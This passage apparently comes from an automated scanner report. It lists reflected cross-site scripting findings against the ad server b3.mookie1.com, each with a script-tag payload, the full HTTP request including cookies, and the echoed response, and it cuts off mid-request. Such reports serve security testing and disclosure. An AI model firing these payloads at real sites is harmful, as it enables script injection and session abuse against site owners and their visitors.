1.64. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89066"><script>alert(1)</script>3bb9319201a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW89066"><script>alert(1)</script>3bb9319201a/1H_11Q1/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW89066"><script>alert(1)</script>3bb9319201a/1H_11Q1/ROSIP/160/2117324463/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.65. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e846f"><script>alert(1)</script>5513091fadf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1e846f"><script>alert(1)</script>5513091fadf/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1e846f"><script>alert(1)</script>5513091fadf/ROSIP/160/2140031721/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.66. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aca2"><script>alert(1)</script>a396d432942 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP7aca2"><script>alert(1)</script>a396d432942/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP7aca2"><script>alert(1)</script>a396d432942/160/1921842916/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.67. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da961"><script>alert(1)</script>aa909b82e8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160da961"><script>alert(1)</script>aa909b82e8f/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160da961"><script>alert(1)</script>aa909b82e8f/591197245/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.68. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c26a"><script>alert(1)</script>210543f7078 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x907c26a"><script>alert(1)</script>210543f7078 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/1127873498/x907c26a"><script>alert(1)</script>210543f7078/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.69. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c414"><script>alert(1)</script>a626a591c0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB37c414"><script>alert(1)</script>a626a591c0b/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB37c414"><script>alert(1)</script>a626a591c0b/Dell/Streak11Q1/Demo/160/1[timestamp]/1428506559/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.70. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda3b"><script>alert(1)</script>ce7cb4a1b8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dellcda3b"><script>alert(1)</script>ce7cb4a1b8e/Streak11Q1/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dellcda3b"><script>alert(1)</script>ce7cb4a1b8e/Streak11Q1/Demo/160/1[timestamp]/1949019059/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.71. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7029"><script>alert(1)</script>96491854817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1d7029"><script>alert(1)</script>96491854817/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1d7029"><script>alert(1)</script>96491854817/Demo/160/1[timestamp]/1704165406/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.72. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7299"><script>alert(1)</script>2cab2f1c0af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demoa7299"><script>alert(1)</script>2cab2f1c0af/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demoa7299"><script>alert(1)</script>2cab2f1c0af/160/1[timestamp]/918491308/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.73. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff3e"><script>alert(1)</script>8f270842d1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demo/160aff3e"><script>alert(1)</script>8f270842d1b/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demo/160aff3e"><script>alert(1)</script>8f270842d1b/1[timestamp]/275945251/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.74. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a8c1"><script>alert(1)</script>73fad9bf007 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x904a8c1"><script>alert(1)</script>73fad9bf007 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_160_TOP&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; Dell=CentroB3; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:46:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]/537082571/x904a8c1"><script>alert(1)</script>73fad9bf007/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.75. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8113"><script>alert(1)</script>008009ecf9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderB3a8113"><script>alert(1)</script>008009ecf9f/NatureMade/Geo_2011Q1/P/300/11299524221@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
